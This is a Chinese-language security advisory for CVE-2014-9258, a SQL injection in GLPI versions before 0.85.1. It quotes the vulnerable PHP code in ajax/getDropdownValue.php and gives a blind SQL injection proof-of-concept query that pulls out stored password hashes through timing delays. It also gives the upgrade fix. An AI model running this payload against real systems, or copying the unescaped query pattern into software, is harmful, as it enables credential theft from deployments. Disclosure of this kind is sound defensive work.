发布日期:2014-12-19
更新日期:2014-12-23
受影响系统:
GLPI GLPI < 0.85.1
描述:
CVE(CAN) ID: CVE-2014-9258
GLPI是计算机及设备管理系统。
GLPI 0.85.1之前版本,ajax/getDropdownValue.php在实现上存在sql注入漏洞,经过身份验证的远程用户通过condition参数,利用此漏洞可执行任意sql命令。
<*来源:Kacper Szurek
链接:
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit Title: GLPI 0.85 Blind SQL Injection
# Date: 28-11-2014
# Exploit Author: Kacper Szurek - http://twitter.com/KacperSzurek
# Software Link: https://forge.indepnet.net/attachments/download/1899/glpi-0.85.tar.gz
# CVE: CVE-2014-9258
# Category: webapps
1. Description
$_GET['condition'] is not escaped correctly.
File: ajax\getDropdownValue.php
if (isset($_GET['condition']) && !empty($_GET['condition'])) {
$_GET['condition'] = rawurldecode(stripslashes($_GET['condition']));
}
if (isset($_GET['condition']) && ($_GET['condition'] != '')) {
$where .= " AND ".$_GET['condition']." ";
}
$query = "SELECT `$table`.* $addselect
FROM `$table`
$addjoin
$where
ORDER BY $add_order `$table`.`completename`
$LIMIT";
if ($result = $DB->query($query)) {
}
2. Proof of Concept
?itemtype=group&condition=1 AND id = (SELECT IF(substr(password,1,1) = CHAR(36), SLEEP(5), 0) FROM `glpi_users` WHERE ID = 2)
3. Solution:
Update to version 0.85.1
?page=annonce&id_breve=334&lang=en
https://forge.indepnet.net/attachments/download/1928/glpi-0.85.1.tar.gz
建议:
厂商补丁:
GLPI
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
?page=annonce&id_breve=334&lang=en
https://forge.indepnet.net/attachments/download/1928/glpi-0.85.1.tar.gz